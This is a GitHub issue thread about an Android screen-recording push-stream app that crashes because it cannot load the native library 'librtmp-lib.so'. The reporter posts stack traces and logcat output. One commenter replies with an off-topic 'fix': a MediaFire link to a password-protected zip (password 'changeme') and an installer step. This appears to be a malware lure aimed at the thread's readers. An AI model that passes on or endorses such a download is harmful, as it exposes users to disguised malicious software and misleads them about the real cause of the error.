### ISSUE TITLE
 couldn't find "librtmp-lib.so

### ISSUE THREAD

**Issue by bear123445** [mabeijianxi/ScreenRecordPushStream#2]
下载的demo可以运行，跑的工程不行。
` java.lang.UnsatisfiedLinkError: dalvik.system.PathClassLoader[DexPathList[[zip file "/data/app/com.cosmos.rtmprecordpush-jWUkj0DNqqECep3Tten4pg==/base.apk"],nativeLibraryDirectories=[/data/app/com.cosmos.rtmprecordpush-jWUkj0DNqqECep3Tten4pg==/lib/arm64, /system/lib64, /system/vendor/lib64]]] couldn't find "librtmp-lib.so"
                                                                                                    	at java.lang.Runtime.loadLibrary0(Runtime.java:1011)
                                                                                                    	at java.lang.System.loadLibrary(System.java:1657)
                                                                                                    	at com.cry.cry.rtmp.RtmpClient.<clinit>(RtmpClient.java:5)
                                                                                                    	at com.cry.cry.rtmp.RtmpClient.open(Native Method)
                                                                                                    	at com.cry.cry.rtmp.rtmp.RESRtmpSender.rtmpOpen(RESRtmpSender.java:23)
                                                                                                    	at com.cosmos.rtmprecordpush.Pusher.openStream$lambda-0(Pusher.kt:26)
                                                                                                    	at com.cosmos.rtmprecordpush.Pusher.$r8$lambda$ebEuSvqsOSPBv49UNd05elRs_3U(Unknown Source:0)
                                                                                                    	at com.cosmos.rtmprecordpush.Pusher$$ExternalSyntheticLambda3.run(Unknown Source:8)
                                                                                                    	at android.os.Handler.handleCallback(Handler.java:794)
                                                                                                    	at android.os.Handler.dispatchMessage(Handler.java:99)
                                                                                                    	at android.os.Looper.loop(Looper.java:173)
                                                                                                    	at android.os.HandlerThread.run(HandlerThread.java:65)`

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bear123445** [comment]
2024-09-02 07:42:01.843  1954-2574  ActivityTrigger         system_server                        E  activityResumeTrigger: not whiteListedcom.cosmos.rtmprecordpush/com.cosmos.rtmprecordpush.MainActivity/1
2024-09-02 07:42:01.847  1954-2574  ActivityTrigger         system_server                        E  activityResumeTrigger: not whiteListedcom.cosmos.rtmprecordpush/com.cosmos.rtmprecordpush.MainActivity/1
2024-09-02 07:42:01.914  4997-5113  AndroidRuntime          com.cosmos.rtmprecordpush            E  FATAL EXCEPTION: push-stream
                                                                                                    Process: com.cosmos.rtmprecordpush, PID: 4997
                                                                                                    java.lang.UnsatisfiedLinkError: dalvik.system.PathClassLoader[DexPathList[[zip file "/data/app/com.cosmos.rtmprecordpush-ItVbNnGKgL-nFEiu-NCaXg==/base.apk"],nativeLibraryDirectories=[/data/app/com.cosmos.rtmprecordpush-ItVbNnGKgL-nFEiu-NCaXg==/lib/arm64, /system/lib64, /system/vendor/lib64]]] couldn't find "librtmp-lib.so"
                                                                                                    	at java.lang.Runtime.loadLibrary0(Runtime.java:1011)
                                                                                                    	at java.lang.System.loadLibrary(System.java:1657)
                                                                                                    	at com.cry.cry.rtmp.RtmpClient.<clinit>(RtmpClient.java:5)
                                                                                                    	at com.cry.cry.rtmp.RtmpClient.open(Native Method)
                                                                                                    	at com.cry.cry.rtmp.rtmp.RESRtmpSender.rtmpOpen(RESRtmpSender.java:23)
                                                                                                    	at com.cosmos.rtmprecordpush.Pusher.openStream$lambda-0(Pusher.kt:26)
                                                                                                    	at com.cosmos.rtmprecordpush.Pusher.$r8$lambda$ebEuSvqsOSPBv49UNd05elRs_3U(Unknown Source:0)
                                                                                                    	at com.cosmos.rtmprecordpush.Pusher$$ExternalSyntheticLambda3.run(Unknown Source:8)
                                                                                                    	at android.os.Handler.handleCallback(Handler.java:794)
                                                                                                    	at android.os.Handler.dispatchMessage(Handler.java:99)
                                                                                                    	at android.os.Looper.loop(Looper.java:173)
                                                                                                    	at android.os.HandlerThread.run(HandlerThread.java:65)
